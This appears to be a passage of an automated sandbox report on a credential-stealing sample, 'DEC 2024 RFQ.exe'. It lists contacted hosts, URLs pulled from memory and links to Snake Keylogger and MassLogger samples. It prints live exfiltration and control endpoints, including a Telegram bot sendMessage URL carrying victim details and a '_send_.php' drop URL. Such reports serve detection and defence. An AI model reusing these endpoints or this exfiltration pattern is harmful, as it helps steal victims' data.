                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.67.152
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      checkip.dyndns.com
                      		132.226.247.73
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.175false
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegSvcs.exe, 00000001.00000002.4150184054.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.orgRegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/botDEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.office.com/lBRegSvcs.exe, 00000001.00000002.4150184054.0000000002E1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20aRegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.orgRegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegSvcs.exe, 00000001.00000002.4151891799.0000000003FD8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000001.00000002.4150184054.0000000002DF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://varders.kozow.com:8081DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://aborters.duckdns.org:8081DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://reallyfreegeoip.org/xml/8.46.123.175$RegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://anotherarmy.dns.army:8081DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallRegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.org/qDEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000001.00000002.4150184054.0000000002DEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://reallyfreegeoip.orgRegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesRegSvcs.exe, 00000001.00000002.4151891799.0000000003EBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D17000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003FB3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003D61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4151891799.0000000003E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedDEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://reallyfreegeoip.org/xml/DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            149.154.167.220
                                                                            		api.telegram.orgUnited Kingdom
                                                                            		62041TELEGRAMRUfalse
                                                                            104.21.67.152
                                                                            		reallyfreegeoip.orgUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            132.226.247.73
                                                                            		checkip.dyndns.comUnited States
                                                                            		16989UTMEMUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1572918
                                                                            Start date and time:2024-12-11 08:58:07 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 31s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:6
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:DEC 2024 RFQ.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@3/4@3/3
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 58
                                                                            • Number of non-executed functions: 279
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                            • VT rate limit hit for: DEC 2024 RFQ.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            02:59:04API Interceptor9710808x Sleep call for process: RegSvcs.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            149.154.167.220Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                              https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                104.21.67.152Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                            Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    132.226.247.73Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    10122024Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/
                                                                                                                    1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • checkip.dyndns.org/

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    checkip.dyndns.comfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 193.122.130.0
                                                                                                                    Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 193.122.130.0
                                                                                                                    New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 193.122.6.168
                                                                                                                    reallyfreegeoip.orgfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 188.114.97.6
                                                                                                                    REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 188.114.96.6
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 172.67.177.134
                                                                                                                    Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    api.telegram.orgItaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    TELEGRAMRUItaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    CLOUDFLARENETUSLXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                    • 104.21.56.70
                                                                                                                    https://advertising-case-id419348.d1yaxxd8bf42y5.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 104.26.5.15
                                                                                                                    apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 162.159.138.232
                                                                                                                    e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.27.3
                                                                                                                    TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 104.21.27.3
                                                                                                                    https://www.picotech.com/download/software/sr/PicoScope6_r6_14_69.exeGet hashmaliciousHavocBrowse
                                                                                                                    • 172.67.0.58
                                                                                                                    Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                    • 172.67.70.233
                                                                                                                    SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                    • 172.67.179.207
                                                                                                                    CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 172.67.158.81
                                                                                                                    https://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                    • 104.18.33.8
                                                                                                                    UTMEMUSfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.247.73
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                    • 132.226.8.169
                                                                                                                    Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 132.226.247.73
                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 132.226.247.73
                                                                                                                    E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 132.226.247.73
                                                                                                                    Hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.247.73
                                                                                                                    10122024Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 132.226.247.73

                                                                                                                    JA3 Fingerprints

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    54328bd36c14bd82ddaa0c04b25ed9adItaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    • 104.21.67.152
                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eapDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    751ietQPnX.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    l92fYljXWF.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                    • 149.154.167.220

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Temp\aut9F17.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):138852
                                                                                                                    Entropy (8bit):7.938511237150346
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:/OY306iGNplGdhPFICpYDAM+a6XQ5deNpv4iqo2evQVzvAxd:2vUpMX9p0TNvaXgV8d
                                                                                                                    MD5:7138923F61C53D2F37EB7739F51620E1
                                                                                                                    SHA1:9F986E9BF2752B80A44815E1EC68622A78678F33
                                                                                                                    SHA-256:DCC9724E91AFB7EBACE5F96AF6187AE3E4D2E74DFC5672A7D1A9D1A520030B10
                                                                                                                    SHA-512:BA0A7CC6ECE58A1DB5736C185E4C8306E795C9E4AD5A6ED15DCD7F59E977C9FB73E767B3E4EF9420BC1D517042F1CE1A4980D81CABF1138365D111E1BCA3BEAB
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
